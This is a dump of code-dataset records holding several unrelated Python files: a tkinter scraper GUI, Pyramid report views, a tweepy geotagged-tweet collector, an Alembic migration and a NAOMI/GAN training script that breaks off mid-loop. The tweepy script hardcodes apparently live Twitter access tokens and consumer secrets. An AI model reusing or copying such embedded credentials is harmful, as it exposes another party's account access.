initRootMenu(tk.Menu,basicProcesses):\n\tdef winResize(self,winDim):\n\t\tself.master.winWidth = winDim.split(\"x\")[0]\n\t\tself.master.geometry(winDim)\n\n\tdef menuLoadWidgets(self):\n\t\tself.master.config(menu=self)\n\n\t\tself.rootMenuFile = tk.Menu(self.master,tearoff=0)\n\t\tself.add_cascade(label=\"File\",menu=self.rootMenuFile)\n\t\tself.rootMenuFile.add_command(label=\"Exit\\t\\t\\t\\t\\t(Alt+F4)\",command=self.master.destroy)\n\t\tself.rootMenuFile.add_command(label=\"Contact\",command=lambda : super(initRootMenu,self).openWebsite(\"http://psaurav1290.github.io\"))\n\n\t\tself.rootMenuResize = tk.Menu(self.master,tearoff=0)\n\t\tself.add_cascade(label=\"Resize\",menu=self.rootMenuResize)\n\t\tself.rootMenuResize.add_command(label=\"Wide\",command=lambda:self.winResize(\"1500x1010\"))\n\t\tself.rootMenuResize.add_command(label=\"Narrow\",command=lambda:self.winResize(\"800x1010\"))\n\n\tdef __init__(self,master=None):\n\t\tsuper().__init__()\n\t\tself.master = master\n\t\tself.menuLoadWidgets()\n\nclass initRoot(themed_tk.ThemedTk):\n\tdef rootLoadWidgets(self):\n\t\tself.rootMenu = initRootMenu(self)\n\t\tself.rootNotebook = initRootNotebook(self)\n\t\n\tdef __init__(self):\n\t\tctypes.windll.shcore.SetProcessDpiAwareness(1)\n\t\tsuper().__init__()\n\t\tself.set_theme(\"plastik\")\n\t\tself.geometry(\"1500x1030+100+0\")\n\t\tself.title(\"Stone Scraper\")\n\t\tself.iconbitmap(\"favicon.ico\")\n\t\tself.winWidth = 1500\n\t\tself.rootLoadWidgets()\n\nif __name__ == \"__main__\":\n\n\troot = initRoot()\n\troot.mainloop()", "repo_name": "psaurav1290/stonescraper", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 30473, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.parse.quote", "line_number": 24, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 24, "usage_type": "attribute"}, {"api_name": "webbrowser.open_new", "line_number": 27, "usage_type": "call"}, {"api_name": 
"requests.get", "line_number": 31, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 33, "usage_type": "call"}, {"api_name": "tkinter.ttk.Frame", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 42, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 46, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 46, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 47, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 47, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 48, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 48, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 49, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 49, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 51, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 51, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 53, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 53, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 55, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 55, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 57, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 57, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 58, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 58, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 60, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 60, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 62, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 62, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 62, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 62, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 63, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 63, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 81, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 81, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 81, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 81, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 83, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 83, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 85, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 86, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 86, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 96, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 96, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 97, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 97, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 98, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 98, "usage_type": "name"}, {"api_name": "re.split", "line_number": 110, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 115, 
"usage_type": "call"}, {"api_name": "re.sub", "line_number": 138, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 139, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 181, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 204, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 205, "usage_type": "call"}, {"api_name": "tkinter.ttk.Style", "line_number": 251, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 251, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 252, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 252, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 253, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 253, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 254, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 254, "usage_type": "name"}, {"api_name": "tkinter.ttk.Frame", "line_number": 276, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 276, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 295, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 295, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 296, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 296, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 297, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 297, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 298, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 298, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 312, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 312, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 313, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 313, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 315, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 315, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 316, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 316, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 318, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 318, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 319, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 319, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 320, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 320, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 322, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 322, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 323, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 323, "usage_type": "name"}, {"api_name": "tkinter.ttk.Frame", "line_number": 371, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 371, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 382, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 382, "usage_type": "name"}, {"api_name": "tkinter.ttk.Frame", "line_number": 396, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 396, "usage_type": "name"}, {"api_name": "tkinter.ttk.Progressbar", "line_number": 398, "usage_type": 
"call"}, {"api_name": "tkinter.ttk", "line_number": 398, "usage_type": "name"}, {"api_name": "tkinter.ttk.Frame", "line_number": 411, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 411, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 432, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 432, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 432, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 432, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 433, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 433, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 436, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 436, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 436, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 436, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 437, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 437, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 437, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 437, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 438, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 438, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 438, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 438, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 439, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 439, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 439, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 439, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 443, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 443, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 444, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 444, "usage_type": "name"}, {"api_name": "tkinter.ttk.Frame", "line_number": 458, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 458, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 466, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 466, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 468, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 468, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 470, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 470, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 470, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 470, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 471, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 471, "usage_type": "name"}, {"api_name": "tkinter.ttk.Frame", "line_number": 485, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 485, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 505, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 505, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 505, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 505, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 506, 
"usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 506, "usage_type": "name"}, {"api_name": "tkinter.ttk.Notebook", "line_number": 522, "usage_type": "attribute"}, {"api_name": "tkinter.ttk", "line_number": 522, "usage_type": "name"}, {"api_name": "tkinter.Menu", "line_number": 534, "usage_type": "attribute"}, {"api_name": "tkinter.Menu", "line_number": 542, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 547, "usage_type": "call"}, {"api_name": "ttkthemes.themed_tk.ThemedTk", "line_number": 557, "usage_type": "attribute"}, {"api_name": "ttkthemes.themed_tk", "line_number": 557, "usage_type": "name"}, {"api_name": "ctypes.windll.shcore.SetProcessDpiAwareness", "line_number": 563, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 563, "usage_type": "attribute"}]}
+{"seq_id": "42999142867", "text": "from pyramid.response import Response\nfrom pyramid.view import view_config, view_defaults\n\nfrom sqlalchemy.exc import DBAPIError\n\nfrom pyramid.httpexceptions import HTTPFound\nfrom pyramid.security import Everyone, Authenticated\n\nfrom .models import (\n DBSession,\n get_operator,\n asdict,\n alog,\n get_logs,\n active_nets,\n get_active_nets,\n all_nets,\n get_net,\n chart_operator_activity,\n chart_net_participation,\n )\n\nimport logging\nlog = logging.getLogger(__name__)\n\n@view_defaults()\nclass ReportViews(object):\n def __init__(self, request):\n self.request = request\n\n @view_config(route_name=\"reports\", renderer=\"reports/index.html\")\n def reports(request):\n return dict()\n\n @view_config(route_name=\"chart_operator_activity\", renderer=\"json\")\n def chart_operator_activity(self):\n return chart_operator_activity()\n\n @view_config(route_name=\"chart_net_participation\", renderer=\"json\")\n def chart_operator_activity(self):\n return chart_net_participation()\n", "repo_name": "stephanellis/netmanager", "sub_path": "netmanager/view_reports.py", "file_name": "view_reports.py", "file_ext": "py", "file_size_in_byte": 1033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "pyramid.view.view_config", "line_number": 31, "usage_type": "call"}, {"api_name": "models.chart_operator_activity", "line_number": 37, "usage_type": "call"}, {"api_name": "pyramid.view.view_config", "line_number": 35, "usage_type": "call"}, {"api_name": "models.chart_net_participation", "line_number": 41, "usage_type": "call"}, {"api_name": "pyramid.view.view_config", "line_number": 39, "usage_type": "call"}, {"api_name": "pyramid.view.view_defaults", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "35364226200", "text": "#import location as location\nimport tweepy\nimport json\n\nACCESS_TOKEN = '4843507186-Kc982XGeypByuevVKdAhbMmEwnOmWWxgw247hUV'\nACCESS_SECRET = 'bKFAS5HDMzRMuckOnbMIjwjDxnKzUeivIz5VbENrs4soR'\nCONSUMER_KEY = '5rkFkJDFPVBVDSvtNtoVpFpgq'\nCONSUMER_SECRET = 'VkK5YIETgPFNgKwt1tFHRSrztnNW00cbVaxCUAgMYqGrI5VHxa'\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)\n\nlatitude = 36.778261\t# geographical centre of search\nlongitude = -119.417932\t# geographical centre of search\nmax_range = 1 \t\t\t# search range in kilometres\napi = tweepy.API(auth)\napi.wait_on_rate_limit = True\napi.wait_on_rate_limit_notify = True\n\nfor tweet in tweepy.Cursor(api.search, q='',geocode = \"%f,%f,%dkm\" % (latitude, longitude, max_range) ,lang= 'en').items():\n print (tweet.created_at, tweet.text, tweet.user.id , tweet.user.followers_count,tweet.user.location)\n\n # with open('data.txt', 'w') as outfile:\n # json.dump(tweet.created_at, tweet.text, tweet.user.id , tweet.user.followers_count,tweet.user.location.txt, outfile)", "repo_name": "SidrahJunaid/thesis1", "sub_path": "thesis_tweet_2/tweet_collection_2.py", "file_name": "tweet_collection_2.py", "file_ext": "py", "file_size_in_byte": 1084, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tweepy.OAuthHandler", "line_number": 10, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 16, "usage_type": "call"}, {"api_name": "tweepy.Cursor", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "72134579367", "text": "\"\"\"empty message\n\nRevision ID: 041172383de8\nRevises: a4a1a1ebb875\nCreate Date: 2022-01-27 22:33:10.207723\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '041172383de8'\ndown_revision = 'a4a1a1ebb875'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('funcionario', sa.Column('senha_hash', sa.String(length=70), nullable=False))\n op.drop_column('funcionario', 'senha')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('funcionario', sa.Column('senha', sa.VARCHAR(length=70), nullable=False))\n op.drop_column('funcionario', 'senha_hash')\n # ### end Alembic commands ###\n", "repo_name": "GiuBontempo/Hamburgueria", "sub_path": "migrations/versions/041172383de8_.py", "file_name": "041172383de8_.py", "file_ext": "py", "file_size_in_byte": 814, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}]}
+{"seq_id": "26672225524", "text": "import argparse\nimport os\nimport math\nimport sys\nimport pickle\nimport time\nimport numpy as np\nimport shutil\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nfrom model import *\nfrom torch.autograd import Variable\nfrom torch import nn\nimport torch\nimport torch.utils\nimport torch.utils.data\n\nfrom helpers import *\nimport visdom\n\nTensor = torch.DoubleTensor\ntorch.set_default_tensor_type('torch.DoubleTensor')\n\ndef printlog(line):\n print(line)\n with open(save_path+'log.txt', 'a') as file:\n file.write(line+'\\n')\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-t', '--trial', type=int, required=True)\nparser.add_argument('--model', type=str, required=True, help='NAOMI, SingleRes')\nparser.add_argument('--task', type=str, required=True, help='basketball, billiard')\nparser.add_argument('--y_dim', type=int, required=True)\nparser.add_argument('--rnn_dim', type=int, required=True)\nparser.add_argument('--dec1_dim', type=int, required=True)\nparser.add_argument('--dec2_dim', type=int, required=True)\nparser.add_argument('--dec4_dim', type=int, required=True)\nparser.add_argument('--dec8_dim', type=int, required=True)\nparser.add_argument('--dec16_dim', type=int, required=True)\nparser.add_argument('--n_layers', type=int, required=False, default=2)\nparser.add_argument('--seed', type=int, required=False, default=123)\nparser.add_argument('--clip', type=int, required=True, help='gradient clipping')\nparser.add_argument('--pre_start_lr', type=float, required=True, help='pretrain starting learning rate')\nparser.add_argument('--batch_size', type=int, required=False, default=64)\nparser.add_argument('--save_every', type=int, required=False, default=50, help='periodically save model')\nparser.add_argument('--pretrain', type=int, required=False, default=50, help='num epochs to use supervised learning to pretrain')\nparser.add_argument('--highest', type=int, required=False, default=1, help='highest resolution in terms of step size in NAOMI')\nparser.add_argument('--cuda', action='store_true', default=True, help='use GPU')\n\nparser.add_argument('--discrim_rnn_dim', type=int, required=True)\nparser.add_argument('--discrim_layers', type=int, required=True, default=2)\nparser.add_argument('--policy_learning_rate', type=float, default=1e-6, help='policy network learning rate for GAN training')\nparser.add_argument('--discrim_learning_rate', type=float, default=1e-3, help='discriminator learning rate for GAN training')\nparser.add_argument('--max_iter_num', type=int, default=60000, help='maximal number of main iterations (default: 60000)')\nparser.add_argument('--log_interval', type=int, default=1, help='interval between training status logs (default: 1)')\nparser.add_argument('--draw_interval', type=int, default=200, help='interval between drawing and more detailed information (default: 50)')\nparser.add_argument('--pretrain_disc_iter', type=int, default=2000, help=\"pretrain discriminator iteration (default: 2000)\")\nparser.add_argument('--save_model_interval', type=int, default=50, help=\"interval between saving model (default: 50)\")\n\nargs = parser.parse_args()\n\nif not torch.cuda.is_available():\n args.cuda = False\n \n# model parameters\nparams = {\n 'task' : args.task,\n 'batch' : args.batch_size,\n 'y_dim' : args.y_dim,\n 'rnn_dim' : args.rnn_dim,\n 'dec1_dim' : args.dec1_dim,\n 'dec2_dim' : args.dec2_dim,\n 'dec4_dim' : args.dec4_dim,\n 'dec8_dim' : args.dec8_dim,\n 'dec16_dim' : 
args.dec16_dim,\n 'n_layers' : args.n_layers,\n 'discrim_rnn_dim' : args.discrim_rnn_dim,\n 'discrim_num_layers' : args.discrim_layers,\n 'cuda' : args.cuda,\n 'highest' : args.highest,\n}\n\n# hyperparameters\npretrain_epochs = args.pretrain\nclip = args.clip\nstart_lr = args.pre_start_lr\nbatch_size = args.batch_size\nsave_every = args.save_every\n\n# manual seed\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nif use_gpu:\n torch.cuda.manual_seed_all(args.seed)\n\n# build model\npolicy_net = eval(args.model)(params)\ndiscrim_net = Discriminator(params).double()\nif args.cuda:\n policy_net, discrim_net = policy_net.cuda(), discrim_net.cuda()\nparams['total_params'] = num_trainable_params(policy_net)\nprint(params)\n\n# create save path and saving parameters\nsave_path = 'saved/' + args.model + '_' + args.task + '_%03d/' % args.trial\nif not os.path.exists(save_path):\n os.makedirs(save_path)\n os.makedirs(save_path+'model/')\n\n# Data\nif args.task == 'basketball':\n test_data = torch.Tensor(pickle.load(open('data/basketball_eval.p', 'rb'))).transpose(0, 1)[:, :-1, :]\n train_data = torch.Tensor(pickle.load(open('data/basketball_train.p', 'rb'))).transpose(0, 1)[:, :-1, :]\nelif args.task == 'billiard':\n test_data = torch.Tensor(pickle.load(open('data/billiard_eval.p', 'rb'), encoding='latin1'))[:, :, :]\n train_data = torch.Tensor(pickle.load(open('data/billiard_train.p', 'rb'), encoding='latin1'))[:, :, :]\nelse:\n print('no such task')\n exit()\nprint(test_data.shape, train_data.shape)\n\n# figures and statistics\nif os.path.exists('imgs'):\n shutil.rmtree('imgs')\nif not os.path.exists('imgs'):\n os.makedirs('imgs')\nvis = visdom.Visdom(env = args.model + args.task + str(args.trial))\nwin_pre_policy = None\nwin_pre_path_length = None\nwin_pre_out_of_bound = None\nwin_pre_step_change = None\n\n############################################################################\n################## START SUPERVISED PRETRAIN ##################\n############################################################################\n\n# pretrain\nbest_test_loss = 0\nlr = start_lr\nteacher_forcing = True\nfor e in range(pretrain_epochs):\n epoch = e+1\n print(\"Epoch: {}\".format(epoch))\n\n # draw and stats \n _, _, _, _, _, _, mod_stats, exp_stats = \\\n collect_samples_interpolate(policy_net, test_data, use_gpu, e, args.task, name='pretrain_inter', draw=True, stats=True)\n \n update = 'append' if epoch > 1 else None\n win_pre_path_length = vis.line(X = np.array([epoch]), \\\n Y = np.column_stack((np.array([exp_stats['ave_length']]), np.array([mod_stats['ave_length']]))), \\\n win = win_pre_path_length, update = update, opts=dict(legend=['expert', 'model'], title=\"average path length\"))\n win_pre_out_of_bound = vis.line(X = np.array([epoch]), \\\n Y = np.column_stack((np.array([exp_stats['ave_out_of_bound']]), np.array([mod_stats['ave_out_of_bound']]))), \\\n win = win_pre_out_of_bound, update = update, opts=dict(legend=['expert', 'model'], title=\"average out of bound rate\"))\n win_pre_step_change = vis.line(X = np.array([epoch]), \\\n Y = np.column_stack((np.array([exp_stats['ave_change_step_size']]), np.array([mod_stats['ave_change_step_size']]))), \\\n win = win_pre_step_change, update = update, opts=dict(legend=['expert', 'model'], title=\"average step size change\"))\n\n # control learning rate\n if epoch == pretrain_epochs // 2:\n lr = lr / 10\n print(lr)\n \n if args.task == 'billiard' and epoch == pretrain_epochs * 2 // 3:\n teacher_forcing = False\n\n # train\n optimizer = 
torch.optim.Adam(\n filter(lambda p: p.requires_grad, policy_net.parameters()),\n lr=lr)\n\n start_time = time.time()\n\n train_loss = run_epoch(True, policy_net, train_data, clip, optimizer, teacher_forcing=teacher_forcing)\n printlog('Train:\\t' + str(train_loss))\n\n test_loss = run_epoch(False, policy_net, test_data, clip, optimizer, teacher_forcing=teacher_forcing)\n printlog('Test:\\t' + str(test_loss))\n\n epoch_time = time.time() - start_time\n printlog('Time:\\t {:.3f}'.format(epoch_time))\n\n total_test_loss = test_loss\n \n update = 'append' if epoch > 1 else None\n win_pre_policy = vis.line(X = np.array([epoch]), Y = np.column_stack((np.array([test_loss]), np.array([train_loss]))), \\\n win = win_pre_policy, update = update, opts=dict(legend=['out-of-sample loss', 'in-sample loss'], \\\n title=\"pretrain policy training curve\"))\n\n # best model on test set\n if best_test_loss == 0 or total_test_loss < best_test_loss: \n best_test_loss = total_test_loss\n filename = save_path+'model/policy_step'+str(args.highest)+'_state_dict_best_pretrain.pth'\n torch.save(policy_net.state_dict(), filename)\n printlog('Best model at epoch '+str(epoch))\n\n # periodically save model\n if epoch % save_every == 0:\n filename = save_path+'model/policy_step'+str(args.highest)+'_state_dict_'+str(epoch)+'.pth'\n torch.save(policy_net.state_dict(), filename)\n printlog('Saved model')\n \nprintlog('End of Pretrain, Best Test Loss: {:.4f}'.format(best_test_loss))\n\n# billiard does not need adversarial training\nif args.task == 'billiard':\n exit()\n\n############################################################################\n################## START ADVERSARIAL TRAINING ##################\n############################################################################\n\n# load the best pretrained policy\npolicy_state_dict = torch.load(save_path+'model/policy_step'+str(args.highest)+'_state_dict_best_pretrain.pth')\n#policy_state_dict = torch.load(save_path+'model/policy_step'+str(args.highest)+'_training.pth')\npolicy_net.load_state_dict(policy_state_dict)\n \n# optimizer\noptimizer_policy = torch.optim.Adam(\n filter(lambda p: p.requires_grad, policy_net.parameters()),\n lr=args.policy_learning_rate)\noptimizer_discrim = torch.optim.Adam(discrim_net.parameters(), lr=args.discrim_learning_rate)\ndiscrim_criterion = nn.BCELoss()\nif use_gpu:\n discrim_criterion = discrim_criterion.cuda()\n\n# stats\nexp_p = []\nwin_exp_p = None\nmod_p = []\nwin_mod_p = None\nwin_path_length = None\nwin_out_of_bound = None\nwin_step_change = None\n\n# Pretrain Discriminator\nfor i in range(args.pretrain_disc_iter):\n exp_states, exp_actions, exp_seq, model_states_var, model_actions_var, model_seq, mod_stats, exp_stats = \\\n collect_samples_interpolate(policy_net, train_data, use_gpu, i, args.task, name=\"pretraining\", draw=False, stats=False)\n model_states = model_states_var.data\n model_actions = model_actions_var.data\n pre_mod_p, pre_exp_p = update_discrim(discrim_net, optimizer_discrim, discrim_criterion, exp_states, \\\n exp_actions, model_states, model_actions, i, dis_times=3.0, use_gpu=use_gpu, train=True)\n\n print(i, 'exp: ', pre_exp_p, 'mod: ', pre_mod_p)\n\n if pre_mod_p < 0.3:\n break\n\n# Save pretrained model\nif args.pretrain_disc_iter > 250:\n torch.save(policy_net.state_dict(), save_path+'model/policy_step'+str(args.highest)+'_pretrained.pth')\n torch.save(discrim_net.state_dict(), save_path+'model/discrim_step'+str(args.highest)+'_pretrained.pth')\n \n# GAN training\nfor i_iter in 
range(args.max_iter_num):\n ts0 = time.time()\n print(\"Collecting Data\")\n exp_states, exp_actions, exp_seq, model_states_var, model_actions_var, model_seq, mod_stats, exp_stats = \\\n collect_samples_interpolate(policy_net, train_data, use_gpu, i_iter, args.task, draw=False, stats=False)\n model_states = model_states_var.data\n model_actions = model_actions_var.data \n \n # draw and stats\n if i_iter % args.draw_interval == 0:\n _, _, _, _, _, _, mod_stats, exp_stats = \\\n collect_samples_interpolate(policy_net, test_data, use_gpu, i_iter, args.task, draw=True, stats=True)\n \n # print(mod_stats)\n update = 'append' if i_iter > 0 else None\n win_path_length = vis.line(X = np.array([i_iter // args.draw_interval]), \\\n Y = np.column_stack((np.array([exp_stats['ave_length']]), np.array([mod_stats['ave_length']]))), \\\n win = win_path_length, update = update, opts=dict(legend=['expert', 'model'], title=\"average path length\"))\n win_out_of_bound = vis.line(X = np.array([i_iter // args.draw_interval]), \\\n Y = np.column_stack((np.array([exp_stats['ave_out_of_bound']]), np.array([mod_stats['ave_out_of_bound']]))), \\\n win = win_out_of_bound, update = update, opts=dict(legend=['expert', 'model'], title=\"average out of bound rate\"))\n win_step_change = vis.line(X = np.array([i_iter // args.draw_interval]), \\\n Y = np.column_stack((np.array([exp_stats['ave_change_step_size']]), np.array([mod_stats['ave_change_step_size']]))), \\\n win = win_step_change, update = update, opts=dict(legend=['expert', 'model'], title=\"average step size change\"))\n \n 